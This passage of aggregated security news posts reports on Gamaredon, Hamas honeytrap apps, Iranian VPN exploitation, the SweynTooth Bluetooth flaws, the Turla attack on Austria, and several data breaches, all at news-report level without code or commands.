The massive use of weaponized Office documents, Office template injection, sfx archives, wmi and some VBA macro stages that dynamically changes,  make the Pterodon attack chain very malleable and adaptive. However, the introduction of a .Net component is a novelty compared to previous Pterodon samples.

Further technical details, including Indicators of Compromise and Yare rules, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB

Pierluigi Paganini

(SecurityAffairs – hacking, Gamaredon)

The post Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign appeared first on Security Affairs.

IDF soldiers tricked into installing malicious apps by Hamas operatives posing as attractive women

Israeli Force (IDF) announced it has thwarted an attempt by the Hamas militant group to hack soldiers’ phones by posing as attractive women on social media.

Israeli Defence Force (IDF) announced it has thwarted an attempt by the Hamas militant group to hack soldiers’ mobile devices by posing as attractive women on social media and instant messaging apps (i.e. Facebook, Instagram, and Telegram). The military has identified at least six social media accounts that were used by attackers to trick the victims into installing malicious apps.

The accounts were named Sarah Orlova, Maria Jacobova, Eden Ben Ezra, Noa Danon, Yael Azoulay, and Rebecca Aboxis, respectively.

Hackers infected dozens of soldiers in recent months, but IDF declared that it has detected the attack, locked out the malware and took down attackers’ infrastructure. Lt. Col. Jonathan Conricus declared that the attackers were not able to steal confidential information from the victims.

“We do not assess there is any significant breach of information,” said Lt. Col. Jonathan Conricus.

This kind of social engineering attacks was already used by Hamas hackers in the past, in July 2018 Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones. At the time, Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then attempted to trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January 2018, when the hackers used the profile of a woman named “Elianna Amer.”

Anyway, IDF experts explained that the last campaign was by far the most sophisticated.

“We see that the level of social engineering is much higher and much more advanced and sophisticated when compared to previous attempts done by Hamas,” Conricus added. “We see that they’re of course learning and upping their game.”The “women” claimed to be new immigrants to explain their poor Hebrew, in some cases, they also claimed to be deaf to trick the soldier into texting, instead of speaking directly on the phone.

The photos used for the profiles employed in the attacks were disguised to make it difficult to “reverse track” them.

IDF experts noticed that attackers send links to the soldiers asking them to download a Snapchat-like app to exchange private photos that could quickly disappear. The links were pointing to three malicious applications (Catch&See, ZatuApp, and GrixyApp) that allowed Hamas attackers to compromise the target phones.

Once installed the apps show a crash notification and then delete their icons from the soldiers’ phone to trick them into thinking that the app was uninstalled.

In reality, the apps run in the background and allow attackers to control the victims’ phone, it could be used by attackers to exfiltrate sensitive data from the devices (i.e. photos, SMS messages, contacts, and more), install other malware on the device, track the phone’s geo-location in real-time, and activate the phone’s camera.

Pierluigi Paganini

(SecurityAffairs – IDF, Hamas)



The post IDF soldiers tricked into installing malicious apps by Hamas operatives posing as attractive women appeared first on Security Affairs.

Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks

Iranian hackers have been hacking VPN servers to plant backdoors in companies around the world

Iran-linked attackers targeted Pulse Secure, Fortinet, Palo Alto Networks, and Citrix VPNs to hack into large companies as part of the Fox Kitten Campaign.

During the last quarter of 2019, experts from security firm ClearSky uncovered a hacking campaign tracked as Fox Kitten Campaign that is being conducted in the last three years.

The campaign targeted dozens of companies and organizations in Israel and around the world, experts pointed out that the most successful and significant attack vector used by the Iranian hackers was the exploitation of unpatched VPN and RDP services.

Iran-linked hackers have targeted companies from different sectors, including IT, Telecommunication, Oil, and Gas, Aviation, Government, and Security”

“This attack vector is not used exclusively by the Iranian APT groups; it became the main attack vector for cybercrime groups, ransomware attacks, and other state-sponsored offensive groups.” reads the report published by ClearSky.

“We assess this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit 1-day vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”

Experts explained that Iranian hackers have focused their interest in 1-day flaws and developed a significant capability in developing working exploits for them that were employed in their operations.

ClearSky confirms that Iranian APT groups in some cases exploited VPN vulnerabilities within hours after their public disclosure.

The investigation Fox Kitten Campaign revealed an overlap, with medium-high probability, between the infrastructure used by the attackers and the one associated to attacks carried out by other Iran-linked APT groups, such as APT34, the APT33, and APT39

In 2019, Iran-linked APT groups were able to quickly exploit the vulnerabilities in the Pulse Secure “Connect” VPN (CVE-2019-11510), the Fortinet FortiOS VPN (CVE-2018-13379), and Palo Alto Networks “Global Protect” VPN (CVE-2019-1579).

The attacks exploiting the above issued were initially detected at the end of August, recently Iran-linked hackers also employed exploits for CVE-2019-19781 Citrix “ADC” VPN flaw in their attacks.

Attackers exploit the VPN flaws to access the enterprise networks, infect systems with a backdoor and from them make move laterally to compromise other computers on the internal network.

After the attackers have exploited vulnerabilities in the VPN systems to breach in the target network, they perform several actions and used multiple tools to maintain their foothold in the network with high privileges.

The list of privilege escalation tools used by hackers includesJuicy Potato,’ Procdump, Mimikatz, and Sticky Keys.

The threat actors also used legitimate software like Putty, Plink, Ngrok, Serveo, or FRP in their attacks.

ClearSky also reported the use of the following custom-made malware:

  • STSRCheck – Self-development databases and open ports mapping tool.
  • POWSSHNET – Self-Developed Backdoor malware – RDP over SSH Tunneling.
  • VBScript – download TXT files from the command-and-control (C2 or C&C) server and unify these files to a portable executable file.
  • Socket-based backdoor over cs.exe – An exe file used to open a socket-based connection to a hardcoded IP address.
  • Port.exe – tool to scan predefined ports an IP’s

The attacks part of the Fox Kitten Campaign observed by ClearSky aimed that gather information on the target networks and plant backdoors, but experts fear that once inside the target infrastructure the hackers could use data wiper (i.e. ZeroCleare and Dustman) in future attacks.

Further technical details on the Fox Kitten Campaign, including indicators of compromise (IOCs), are reported in the analysis published by ClearSky.

Pierluigi Paganini

(SecurityAffairs – Fox Kitten campaign, VPN)

The post Fox Kitten Campaign – Iranian hackers exploit 1-day VPN flaws in attacks appeared first on Security Affairs.

US administration requests $9.8B for cyber 2021 budget for the Department of Defense

The US administration requested $9.8 billion for cyber in next year’s budget for the Department of Defense, the amount is the same as last year.

The US administration requested $9.8 billion for cyber operations in next year’s budget for the Department of Defense, a data that confirms the strategic importance of the fifth domain of the warfare for the US Government

The amount requested for the Department of Defense in the “DOD Releases Fiscal Year 2021 Budget Proposal” is nearly the same one as last year for cyber operations that the US military will conduct in 2020.

The budget was released on February 10, it requests $9.8 billion for fiscal year 2021 on cyber activities, while the previous budget was about $9.6 billion in the fiscal year 2020.

The investments of the US administration in the Cyberspace Domain ($9.8 billion) include:

  • Cybersecurity – $5.4 billion
  • Cyberspace – Operations – $3.8 billion
  • Cyberspace Science and Technology – $556 million
  • In addition to the $9.8 billion, the budget funds:​

– Artificial Intelligence – $841 million
– Cloud – $789 million

Department of Defense

Below the details for every single item:

♦ $5.4 billion for cybersecurity – The $5.4 billion Cybersecurity budget aims at increasing capabilities in Cross Domain Solutions, Next-Generation Encryption Solutions, and Network Modernizations. It aims at reducing the risk of cyber attacks on networks, systems, and information. The budget includes:

  • $678 million for cryptology modernization and next-generation platforms;
  • $296.2 million for securing points of information and sharing;
  • $198.5 million for Operationalizing Identity and Credential Access Management (ICAM) modernization.
  • $67.2 million for Comply to Connect (C2C) and Automated Continuous Endpoint Monitoring (ACEM);
  • $69.8 million for critical infrastructure.

♦ $3.8 billion for operations. This investment would cover offensive and defensive operations and support the implementation of the Cyber Strategy by funding programs and activities. The budget includes:

  • $431.6 M for Cooperation with allies and partners in the conduct of “hunt forward” defensive cyberspace operations to counter malign cyber actors.
  • $238.6 for the development of capabilities to integrate joint, coalition and inter-agency command and control to enhance multi-domain operations.
  • $460.4 for mission assurance activities that allow the Department to better understand the risks to its key missions and to increase resilience and implement mitigations to reduce the vulnerability of key assets.

The document includes another $2.2 billion to support the Cyber Mission Forces.

DoD Budget Request is available here.

Pierluigi Paganini

(SecurityAffairs – Department of Defense, hacking)

The post US administration requests $9.8B for cyber 2021 budget for the Department of Defense appeared first on Security Affairs.

Organizers of major hacking conferences in Asia put them on hold due to Coronavirus outbreak

Organizers of Black Hat Asia and DEF CON China security conferences announced that they put the events on hold due to the Coronavirus outbreak.

Bad news for cybersecurity passionates and experts, organizers of Black Hat Asia and DEF CON China security conferences announced last week that they have put the events on hold due to the Coronavirus outbreak.

The announcements come after the organizations of another important tech even, the Mobile World Congress (MWC) in Barcelona, announced that the meeting has been canceled due to the Coronavirus outbreak.

The organizer of the Black Hat Asia conference announced that they have decided to postpone the event in the fall this year to protect the health and safety of the attendees.

“After careful consideration of the health and safety of our attendees and partners, we have made the difficult decision to postpone Black Hat Asia 2020 due to the coronavirus outbreak. We understand the inconvenience this may cause and will follow up directly with all of those who are scheduled to attend and exhibit to determine appropriate next steps.” reads the notice published on the official website of the conference.

“Please know we are planning to host Black Hat Asia 2020 in the fall this year.”

The event was scheduled between March 31- April 3 at Marina Bay Sands in Singapore, where authorities raised the risk assessment DORSCON Orange, which means that the disease is severe and spreads easily from person to person.

It is not clear if the organizers will refund people that bought the tickets and will not be able to participate in the fall.

Organizers of another important cyber security conference, DEF CON China 2.0 (initially planned between 17-19 April in Beijing), already announced at the end of January the decision to postpone the event due to the coronavirus outbreak.

“In light of global precautions being announced to combat the coronavirus outbreak, we’ve decided to postpone DEF CON China 2.0. We regret inconveniencing any of you. Know that we are committed to holding the event once it’s safe to do so.” reads a post on the event’s forum.

“If you want a refund on purchased tickets, please submit a refund request to your ticket broker. If you’d rather that we hold your reservation for our new dates, you don’t have to do anything and we’ll keep your tickets on file.”

The organizers accept refund requests from participants that have bought the tickets for the event.

Pierluigi Paganini

(SecurityAffairs – Coronavirus outbreak, hacking)

The post Organizers of major hacking conferences in Asia put them on hold due to Coronavirus outbreak appeared first on Security Affairs.

Security Affairs newsletter Round 251

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Maastricht University finally paid a 30 bitcoin ransom to crooks
Massive DDoS attack brought down 25% Iranian Internet connectivity
The number of cyber attacks on Saudi Aramco is increasing
1.2 million CPR numbers for Danish citizen leaked through tax service
A cyber-attack on major banks could trigger a liquidity crisis, ECB President Christine Lagarde warns
A sad story of pedophilia on how disgusting images fed the web
Chinese Military personnel charged with hacking into credit reporting agency Equifax
Malaysias MyCERT warns cyber espionage campaign carried out by APT40
Netanyahus party Elector app exposes data on over 6.5M Israelis
Adobe addresses 42 flaws in its five products
Dell SupportAssist flaw exposes computers to hack, patch it asap!
OT attacks increased by over 2000 percent in 2019, IBM reports
Safer internet day – Cybercrime facts Infographic
South Korean Woori Bank is accused of unauthorized use of customer data
The Altsbit exchange will exit in May following a hack
440M records found online in unprotected database belonging to Estée Lauder
Crypto AG was spied for US, German intelligence agencies for decades
Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw
Reading the 2019 Internet Crime Complaint Center (IC3) report
Siemens fixed multiple DoS flaws in several products
600+ installs of WordPress Cookie Consent Plugin vulnerable to hack. Fix it now!
Google Play Protect prevented 1.9 billion malware installs from Third-party stores in 2019
Microsoft recommends Exchange admins to disable the SMBv1 protocol
MoleRATs APT group targets Palestinian territories
Three Italian universities hacked by LulzSec_ITA collective
US officials claim Huawei Equipment has secret backdoor for spying
Helix Bitcoin Mixer operator charged for laundering over $300M worth of Bitcoin
Nedbank client data compromised in security breach at third-party provider
PoS malware infected systems at 71 locations operated by US store chain Rutters
Russian watchdog fines Twitter, Facebook for not moving user data to local servers
US Govt agencies detail North Korea-linked HIDDEN COBRA malware
NextMotion plastic surgery tech firm data leak
SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors
The cyber attack against Austrias foreign ministry has ended

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 251 appeared first on Security Affairs.

IOTA cryptocurrency shuts down entire network after a coordinated attack on its Trinity wallet

IOTA Foundation behind the IOTA cryptocurrency was forced to shut down its entire network following a cyber attack that resulted in the theft of funds.

Hackers have exploited a vulnerability in the official IOTA wallet to steal funds from the users. In response to the incident, the IOTA Foundation, the nonprofit organization behind the IOTA cryptocurrency, has decided to take down its entire network.

The attack took place on February 12, 2020, the incident was confirmed via Twitter by the foundation:

The foundation also published details about the incident on its website, it explained that decided to shut down “Coordinator” node a few minutes after it became aware of the fraudulent transactions.

IOTA foundation

The Coordinator is a note of the IOTA network that is involved in the final approval of any IOTA currency transactions.

The measure was adopted to prevent hackers from stealing additional funds, according to the foundation, the perpetrator targeted high-value accounts first, before moving on to smaller accounts and then being interrupted early by the halt of the coordinator.

“The attack pattern analysis showed that the halt of the coordinator interrupted the attacker’s attempts to liquidate funds on exchanges.” reads the post published by the fundation. “The stolen funds have been purposely and repeatedly merged and split to obfuscate the investigation, and with the current token exchange rate as well as exchanges’ KYC limits in mind. We received additional feedback from more exchanges (not all yet), confirming that none of the identified transactions has been received or liquidated.”

At the time of publishing this post, the IOTA network is still down and an investigation is ongoing.

IOTA members along with external cyber security experts that have joined the investigation discovered that hackers exploited a dependency of the Trinity wallet app.

“We have found the exploit and are now working on resolving the issue. As expected, the exploit is related to the (user-facing) Trinity Wallet. The IOTA core protocol is – as already communicated before – not breached.” continues the post.

The IOTA has not disclosed the total value of the stolen funds, but experts believe it could be more than $1 million worth of IOTA coins.

Pierluigi Paganini

(SecurityAffairs – hacking, IOTA foundation)

The post IOTA cryptocurrency shuts down entire network after a coordinated attack on its Trinity wallet appeared first on Security Affairs.

NextMotion plastic surgery tech firm data leak

Photos and personal information belonging to patients of the NextMotion plastic surgery tech firm have been exposed online through an unsecured S3 bucket.

Hundreds of thousands of documents containing photos and personal information belonging to patients of the plastic surgery technology company NextMotion have been exposed online through an unsecured Amazon Web Services (AWS) S3 bucket.

NextMotion is a French plastic surgery tech company that provides imaging and patient management software that allows complete treatment records on an aesthetic patient.

The software is able to create before and after pictures and videos of patients during the treatment process.

Nextmotion is an ecosystem based on a medical cloud that allows you to sort, store and access your data wherever you are,” states the company on its website.

“In that sense, all your data is covered with the highest requested security level as it is hosted in France on servers authorized by the Haute Autorité de Santé (French Health Authority) – in our case, AWS who is certified.”

The S3 bucket contained approximately 900,000 files, including highly sensitive patient images and videos, as well as plastic surgery, and consultation documents.

“The compromised database contained 100,000s of profile images of patients, uploaded via NextMotion’s proprietary software. These were highly sensitive, including images of patients’ faces and specific areas of their bodies being treated.” reads the post published by vpnMentor. “Our team had access to almost 900,000 individual files. These included highly sensitive images, video files, and paperwork relating to plastic surgery, dermatological treatments, and consultations performed by clinics using NextMotion’s technology.”

The personal patients’ information viewed by the experts included invoices for treatments, outlines for proposed treatments, video files, including 360-degree body and face scans, profile photos of the patients (both facial and body).

According to NextMotion, patient data stored in the unsecured database “had been de-identified,” but vpnMentor experts pointed out that paperwork and invoices leaked also contained Personally Identifiable Information (PII) data of patients.

We were informed on January 27, 2020, that a cybersecurity company had undertaken tests on randomly selected companies and had managed to access our information system.” reads the notice published by the company. “They were able to access and extract medias (videos and photos) from some of our patients’ files. Those media were on a specific database separated from patient’s text database  (names, birth dates, notes, etc) – only the media database was exposed, patient’s database was not exposed.”

Experts explained that the type of data leaked online can be abused to target patients in a wide range of malicious activities, including scams, fraud, and phishing and other attacks.

NextMotion pointed out that it has immediately implemented corrective measured to protect its customers.

Below the timeline of the discovery of the data leak:

  • Date discovered: 24/01
  • Date vendors contacted: 27/01
  • Date of contact with AWS: 30/01
  • Date of Action: 5/02
  • Date of Reply: 11/02

In October 2017, another incident affected plastic surgery patients. The celeb London Bridge Plastic Surgery clinic confirmed in a statement that it was the victim of a cyber attack, the alleged culprit is a well-known hacker that goes online with the moniker The Dark Overlord.

Pierluigi Paganini

(SecurityAffairs – NextMotion, data leak)

The post NextMotion plastic surgery tech firm data leak appeared first on Security Affairs.

SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors

Security experts have discovered multiple flaws, dubbed SweynTooth, in the Bluetooth Low Energy (BLE) implementations of major system-on-a-chip (SoC) vendors.

A group of researchers has discovered multiple vulnerabilities, tracked as SweynTooth, in the Bluetooth Low Energy (BLE) implementations of major system-on-a-chip (SoC) vendors.

The group was composed of researchers Matheus E. Garbelini, Sudipta Chattopadhyay, and Chundong Wang from the Singapore University of Technology and Design.

The protocol Bluetooth Low Energy (BLE) was released in 2010 and it is designed to implement a new generation of services for mobile applications. The protocol specifically addresses power consumption of new applications, trying to reduce the draining of batteries in a condition of constantly transmitting signals.

Now experts found 12 vulnerabilities in the BLE software development kits (SDKs) of seven SoC vendors (Texas Instruments, NXP, Cypress, Dialog Semiconductors, Microchip, STMicroelectronics and Telink Semiconductor) that could be exploited to hack into various smart devices, including devices and environmental tracking or sensing systems.

Experts revealed that they have also identified several medical and logistics products that could be affected by the SweynTooth flaws.

The researchers already reported the flaws to the vendors, and most of them have already addressed them the issues

SweynTooth captures a family of 12 vulnerabilities (more under non-disclosure) across different BLE software development kits (SDKs) of seven major system-on-a-chip (SoC) vendors.” reads the analysis published by the researchers. “The vulnerabilities expose flaws in specific BLE SoC implementations that allow an attacker in radio range to trigger deadlocks, crashes and buffer overflows or completely bypass security depending on the circumstances.”

Experts confirmed that more issues are still under disclosure and that the list of impacted SoC vendors is longer, and the number of IoT products designed on top of vulnerable SoCs still need independent patches from their respective vendors.

SweynTooth highlights concrete flaws in the BLE stack certification process. We envision substantial amendments to the BLE stack certification to avoid SweynTooth style security flaws. We also urge SoC vendors and IoT product manufacturers to be aware of such security issues and to initiate focused effort in security testing.” continues the experts.

Experts classified the SweynTooth flaws according to their types and their behaviours on the vulnerable devices, below the classes defined by the experts:

  • Crash: Vulnerabilities that remotely trigger hard faults forcing the device crash. Typically, these issues trigger memory corruption, such as a buffer overflow on BLE reception buffer.
  • Deadlock: Vulnerabilities that affect the availability of the BLE connection without causing a hard fault or memory corruption. These issues usually occur due to some improper synchronization between user code and the SDK firmware distributed by the SoC vendor,
  • Security Bypass: Vulnerabilities that could be exploited by attackers in radio range to bypass the latest secure pairing mode of BLE. These issues are particularly dangerous because an attacker in the radio range has arbitrary read or write access to device’s functions.

“The exploitation of the vulnerabilities translates to dangerous attack vectors against many IoT products released in 2018-2019. At first glance, most of the vulnerabilities affect product’s availability by allowing them to be remotely restarted, deadlocked or having their security bypassed.  “continues the experts.

Making a quick search on the Bluetooth Listing Search site, experts discovered that around 480 product listings employ the affected SoCs, each of them containing several products.

A vulnerability named Link Layer Length Overflow impacts Cypress PSoC4/6 BLE Component 3.41/2.60 (CVE-2019-16336) and NXP KW41Z 3.40 SDK (CVE-2019-17519). The issue initially causes denial of service (DoS), but “attackers could reverse engineer products firmware to possibly leverage remote execution,” the researchers say.

Below the list of the flaws:

  • Link Layer LLID deadlock flaws, deadlock issued that affect Cypress (CVE-2019-17061) and NXP devices (CVE-2019-17060). The issues impact the BLE communication between devices.
  • Truncated L2CAP (CVE-2019-17517) flaw, a crash issue that affects Dialog DA14580 devices running SDK 5.0.4 or earlier. The issue could trigger a DoS condition causing the crash of the device, the same as Silent Length Overflow (CVE-2019-17518), which affects Dialog DA14680 devices.
  • Invalid Connection Request (CVE-2019-19195), a DoS issue that affects the Texas Instruments CC2640R2 BLE-STACK and CC2540 SDKs. A similar issue is the Unexpected Public Key Crash (CVE-2019-17520) and affects Texas Instruments CC2640R2 BLE-STACK-SDK could lead to DoS and product restarts.
  • Sequential ATT Deadlock (CVE-2019-19192), a deadlock issue that affects STMicroelectronics WB55 SDK V1.3.0 and earlier. Invalid L2CAP fragment (CVE-2019-19195) that could be exploited by a remote attacker to restart running Microchip ATMSAMB11 BluSDK Smart v6.2 and earlier.
  • The Key Size Overflow vulnerability (CVE-2019-19196), a crash issue that impacts all Telink Semiconductor BLE SDKs.
  • The security bypass flaw (CVE-2019-19194) in products using the Telink SMP implementation, which could be abused to completely bypass security in BLE products.

Below two video PoCs published by the experts that show the exploitations of the issues in some products:

At the time of the report. Dialog, Microchip and STMicroelectroncs have yet to release patches to address the flaws in the affected products.

“Our findings expose some fundamental attack vectors against certified and recertified BLE Stacks which are supposed to be ‘safe’ against such flaws. We carefully investigated the reasons that might explain the presence of SweynTooth vulnerabilities on the affected SoCs. We believe this is due to the imposed isolation between the link layer and other Bluetooth protocols, via the Host Controller Interface (HCI) protocol,” the researchers conclude.

Pierluigi Paganini

(SecurityAffairs – SweynTooth, hacking)

The post SweynTooth Bluetooth flaws affect devices from major system-on-a-chip (SoC) vendors appeared first on Security Affairs.

The cyber attack against Austria’s foreign ministry has ended

Austria’s foreign ministry announced that the cyber attack against its systems, allegedly carried by a state actor has ended.

Earlier January, Austria’s foreign ministry announced it was facing a “serious cyberattack” and that it could be the work of a nation-state actor.

“Due to the gravity and nature of the attack, it cannot be ruled out that this is a targeted attack by a state actor,” the foreign ministry said at the time in a joint statement with the interior ministry.

“Despite all the intensive security measures, there is no 100-percent protection against cyberattacks.”

The attack took place on the evening of Saturday 4 January evening and it was quickly detected. Local reports revealed that the attack aimed at the ministry’s IT infrastructure.

Authorities immediately adopted the defensive measures to protect their infrastructure, it also set up a special committee to respond to the incident. It is not clear if the hackers gained access to sensitive data.

This week, the Austrian foreign ministry announced that the cyber attack against its systems has ended.

“After really intensive work and excellent cooperation between all the departments involved, last weekend we managed to clean up our IT systems and end the cyber attack on the Foreign Ministry,” said Foreign Minister Alexander Schallenberg. “The highest possible data security at the Foreign Ministry is guaranteed and no damage to the IT equipment could be detected.”

“According to current knowledge, this was a targeted attack against the Foreign Ministry with the intention of gathering information. However, due to the dimension and the high complexity, it cannot yet be said beyond doubt who is behind the attack.”

The authorities are still investigating the attack, the government experts have no doubt about the fact that it was a targeted cyber-espionage attack against the Foreign Ministry.

“Espionage is a serious offence, so such accusations should not be made lightly,” explained Schallenberg.

Intelligence experts speculated the involvement of Russian or Chinese cyber spies, but the local Russian ambassador Dmitri Ljubinski denied any involvement and demanded an apology.

A local radio station, the Österreichischer Rundfunk (ORF, state broadcaster Austrian Radio), reported in January that the attack was carried out by the Russia-linked Turla APT Group.

“The entire course of this cyberattack and above all the high-level target are characteristic of the “Turla” group, which operates aggressive “foreign intelligence”. After the discovery, Turla always delivers violent cyber battles to the technicians of the attacked networks. That still happens in the Republic’s Ministry of Foreign Affairs.” reported ORF. “The entire attack on a target network starts with a tiny command line module that sends a TCP request to an external command / control server, the command consisting of only four bytes of text [!]. This command brings in a so-called “dropper”, which then places the subsequent trojan in disguise.”

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Major cyber ​​attacks are a rarity in Austria, only a few large-scale attacks were observed in the past years. In September 2019, before the National Council election, the ÖVP was hit by a “very targeted hacker attack” on the party headquarters. 

In 2018, the websites of the parliament and various ministries in Austria were targeted by DDoS attacks (Distributed Denial of Service). 

Other European countries suffered similar attacks in the past, in 2015 more than 20,000 computers belonging to the German Bundestag were infected with malware. Experts and media reported a possible involvement of Russian state-sponsored hackers

Pierluigi Paganini

(SecurityAffairs – Austria, hacking)

The post The cyber attack against Austria’s foreign ministry has ended appeared first on Security Affairs.

US Govt agencies detail North Korea-linked HIDDEN COBRA malware

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) released reports on North Korea-linked HIDDEN COBRA malware.

The FBI, the US Cyber Command, and the Department of Homeland Security have published technical details of a new North-Korea linked hacking operation.

The government experts released new and updated Malware Analysis Reports (MARs) related to new malware families involved in new attacks carried out by North Korea-linked HIDDEN COBRA group.

The following MARs reports aim at helping organizations to detect HIDDEN COBRA activity:

Let’s give a close look at each malware detailed in the MARs reports just released:

  • BISTROMATH – a full-featured RAT implant;
  • SLICKSHOES – a Themida-packed dropper:
  • CROWDEDFLOUNDER – a Themida packed 32-bit Windows executable, which is designed to unpack and execute a Remote Access Trojan (RAT) binary in memory;
  • HOTCROISSANT – a full-featured beaconing implant used for conducting system surveys, file upload/download, process and command execution, and performing screen captures;
  • ARTFULPIE – an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL;
  • BUFFETLINE – a full-featured beaconing implant. 

US agencies also updated information included in a MARs report on the HOPLIGHT proxy-based backdoor trojan that was first analyzed in April 2019.

Each report includes a detailed “malware descriptions, suggested response actions, and recommended mitigation techniques.”

The US Cyber Command also announced to have uploaded malware samples to VirusTotal:

CISA reports provide the following recommendations to users and administrators to strengthen the security posture of their organization’s systems:

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
• Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Pierluigi Paganini

(SecurityAffairs – HIDDEN COBRA, malware)

The post US Govt agencies detail North Korea-linked HIDDEN COBRA malware appeared first on Security Affairs.

Russian watchdog fines Twitter, Facebook for not moving user data to local servers

A Russian court fined Twitter and Facebook 4 million rubles each for refusing to store the personal data of Russian citizens on local servers.

At the end of January, Russia’s telecommunications watchdog Roskomnadzor instituted administrative proceedings against Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

On Thursday, a court in Moscow fined Twitter and Facebook 4 million rubles (roughly $63,000) each for refusing to store the personal data of Russian citizens on servers that are located in Russia. According to the media, these are the largest penalties imposed by the Kremlin on Western IT firms under internet use laws since 2012.

“The fines of nearly $63,000 are the first five-figure fines levied on tech companies since Russia adopted a flurry of legislation starting in 2012 designed to tighten the government’s grip on online activity.” reported the Associated Press.

Roskomnadzor is attempting to oblige the IT giants, including Facebook, Twitter, and Google to move data related to Russian citizens to servers in Russia allowing the Government to monitor them.,

Roskomnadzor pointed out that the fines are the only anticipation of further penalties for both companies that would be fined 18 million rubles ($283,000) each if they don’t comply this year.

This isn’t the first time that Twitter and Facebook were fined by the Kremlin, in 2019 the Russian watchdog punished both with a $47-fine for violating the same personal data regulation.

The Russian government could also ban IT companies that will not comply with the same law.

The Russian government has already blocked the professional social network LinkedIn in 2016 under the data-localization legislation.

Pierluigi Paganini

(SecurityAffairs – Twitter, Facebook )

The post Russian watchdog fines Twitter, Facebook for not moving user data to local servers appeared first on Security Affairs.

Nedbank client data compromised in security breach at third-party provider

Nedbank bank announced on Thursday that a security breach at a third-party supplier has compromised the details of as many as 1.7 million of its clients.

Nedbank bank disclosed on Thursday a security breach at a third-party supplier that has compromised the details of as many as 1.7 million of its clients.

The bank revealed that the service provider Computer Facilities, which is a direct marketing company that issues SMS and e-mail marketing information on behalf of Nedbank and other companies, has suffered a “data security issue.”

The incident was discovered as part of “routine and ongoing monitoring procedures” conducted by the bank.

Nedbank Limited is a wholly owned subsidiary of Nedbank Group that operates in South Africa, Lesotho, Malawi, Mozambique, Namibia, Swaziland, and Zimbabwe,

“Nedbank has investigated a data security issue that occurred at the premises of a third-party service provider, namely Computer Facilities (Pty) Ltd – a direct marketing company that issues SMS and email marketing information on behalf of Nedbank and a number of other companies.” reads a security notice published by the bank. “A subset of the potentially compromised data at Computer Facilities included personal information (names, ID numbers, telephone numbers, physical and/or email addresses) of some Nedbank clients.”

Nedbank confirmed that its systems or client bank accounts have not been compromised or are at risk as a result of the security issue at Computer Facilities (Pty) Ltd.

Once the bank became aware of the security breach, it engaged forensic experts to conduct an extensive investigation.

The company determined that data belonging to 1.7 million past and current customers have been affected. Exposed info includes names, ID numbers, home addresses, phone numbers, and email addresses.

“We have moved swiftly to proactively secure and destroy all Nedbank client information held by Computer Facilities (Pty) Ltd. Information from Nedbank Retail relating to approximately 1,7 million clients was potentially affected of which 1,1 million are active clients.” continues the notice.

The bank began notifying customers via SMS.

Since the incident, the bank says the contractor’s network has been taken offline to prevent any further attacks. As a precautionary measure, the bank also deleted any customer data from the contractor’s systems.

Bank officials apologized for the incident and confirmed that the investigation is still ongoing.

“We regret the incident that occurred at the third-party service provider, namely Computer Facilities (Pty) Ltd and the matter is receiving our urgent attention. The safety and security of our clients’ information is a top priority. We take our responsibility to protect our client information seriously and our immediate focus has been on securing all Nedbank client data at Computer Facilities (Pty) Ltd, which we have done. In addition to this, we are communicating directly with affected clients. We are also taking the necessary actions in close cooperation with the relevant regulators and authorities,” Nedbank CEO Mike Brown says.

Nedbank Group Chief Information Officer Fred Swanepoel says: “The third-party service provider namely, Computer Facilities (Pty) Ltd did not have any links to our systems. Our team of IT specialists and external cyber security experts have been working continuously with them since we became aware of this matter. Clients’ bank accounts have not been compromised in any manner whatsoever and clients have not suffered any financial loss. Nedbank remains vigilant in its efforts to contain cyber-crime.” 

Pierluigi Paganini

(SecurityAffairs – Nedbank, banking)

The post Nedbank client data compromised in security breach at third-party provider appeared first on Security Affairs.

PoS malware infected systems at 71 locations operated by US store chain Rutter’s

US store chain Rutter disclosed a security breach, 71 locations were infected with a point-of-sale (POS) malware used to steal customers’ credit card information.

The Rutter’s, a U.S. convenience store, fast food restaurant, and gas station chain owner, has disclosed a security breach.

The company confirmed that attackers gained access to its stores’ network system and infected payment systems at 71 locations with a point-of-sale (POS) malware.

The US store chain Rutter’s operates more than 75 locations throughout Pennsylvania, Maryland, and West Virginia.

According to a Notice of Payment Card Incident published by the company, attackers have stolen some payment card data from cards used on point-of-sale (POS) devices from convenience stores and fuel pumps. Threat actors planted PoS malware into the payment processing systems that was specifically designed to steal card data.
